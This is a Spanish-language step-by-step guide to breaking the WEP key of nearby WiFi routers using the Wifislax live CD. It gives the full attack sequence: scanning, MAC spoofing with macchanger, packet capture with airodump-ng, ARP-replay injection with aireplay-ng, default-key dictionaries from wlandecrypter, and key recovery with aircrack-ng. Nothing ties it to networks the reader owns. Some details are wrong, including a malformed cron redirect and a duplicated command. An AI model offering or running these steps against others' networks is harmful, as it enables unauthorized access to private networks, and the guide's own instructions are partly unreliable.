redes red wifi wireless iwconfig rtap0 wifislax ipw2200 airodump aircrack
1. Arrancar con el cd [[http://www.wifislax.com/descargas.php|Wifislax 3.1]] dentro
2. Seleccionar la primera opción, entorno gráfico
3. Teclear usuario y contraseña:
root
toor
4. Abrir una consola (se recomienda abrir una consola por comando)
5. Ver las interfaces
iwconfig -a
Lo normal es que aparezcan:
ethx => interfaz wifi
rtap0 => interfaz wifi lista para inyectar
6. Rastrear las redes a nuestro alcance:
iwlist ethx scan
Para una red dada es importante quedarse con el nombre (ESSID), la MAC (BSSID) y el canal
7. Por si las moscas levantar las dos interfaces:
ifconfig ethx up && ifconfig rtap0 up
8. Cambiar la mac (en el ejemplo le ponemos 00:11:22:33:44:55):
macchanger -m 00:11:22:33:44:55 eth3
9. Lanzar los siguientes comandos (no sé exactamente lo que hacen):
iwconfig eth3 essid "ESSID" key 11111111111
airodump-ng -c 6 -b mac_del_ap -w captura_ESSID rtap0
aireplay-ng -3 -x 1024 -g 1000000 -b BSSID -h 00:11:22:33:44:55 -i rtap0 ethx
10. **OPCIONAL**
Habida cuenta que el equipo se puede quedar tostado, o se puede ir la luz, es conveniente programar una tarea en cron que grabe cada minuto el fichero .cap que almacena las capturas en un llavero usb o bien en el propio disco duro del pc/portátil, al objeto de poder aprovechar el trabajo realizado.
11.1 Crear el guión:
nano /root/script.sh
11.2 Contenido (OJO, comprobad las rutas):
#!/bin/bash
# Ejemplo para un disco duro
cp /root/*cap /mnt/hda1/captura/
# Ejemplo para un llavero usb
cp /root/*cap /mnt/sda1/captura/
11.3 Grabar y cerrar
11.4 Darle permisos de ejecución:
chmod +x /root/script.sh
11.5 Programar la tarea en cron:
crontab -e
11.6 Añadir la siguiente linea (OJO, comprobad las rutas):
**Revisar**, porque el 2>1 null es importante, si no, no funciona
* * * * * /root/script.sh 2>1 null
11.7 Grabar y salir
12. **OPCIONAL**
Existe una aplicación, 'wlandecrypter-ng' que, si la dirección MAC (BSSID) del router es una de las que soporta y el nombre del punto de acceso (ESSID) es del tipo 'WLAN_xx' (por tanto no se ha cambiado su valor de fábrica), genera un diccionario, con lo que se podrá obtener la clave del router con muy pocos paquetes (menos de 10) obtenidos.
12.1 Teclear en una consola el siguiente comando:
wlandecrypter BSSID ESSID /root/diccionario_ESSID
Si el comando nos lanza un error, significa que la dirección MAC del router (BSSID) no está 'soportada' por wlandecrypter-ng.
13. **OPCIONAL**
Si pasamos el fichero /root/captura_ESSID.cap a un pc que tenga aircrack-ng instalado, saca la clave en unos pocos segundos. En caso de que lo hagamos desde el propio pc con el live-cd corriendo, puede tardar horas (7, 8...).
13.1 Instalar aircrack-ng
aptitude install aircrack-ng
14. Hay que estar al loro de la salida del comando 'airodump-ng', en especial de la columna que dice 'data', que son los paquetes capturados.
Cuando queramos intentar sacar la contraseña, lanzamos el siguiente comando:
Si hemos podido generar un diccionario en el paso 12:
aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap
En caso contrario:
aircrack-ng -w /root/diccionario_ESSID /root/captura_ESSID.cap
Si tenemos suerte, aparecerá el siguiente mensaje:
KEY FOUND! [ 43:30:30:31:44:32:30:33:44:35:44:31:31 ] (ASCII: C001D203D5D11 )
Decrypted correctly: 100%
Es **MUY** recomendable pasar el fichero .cap a un pc con aircrack-ng instalado (ver paso 13), pues de ese modo se obtiene la clave en unos pocos segundos
Postdata: Yo en clientes windows, le he metido la clave alfanumérica sin los dos puntos. En el ejemplo anterior, el valor introducido sería:
43303031443230334435443131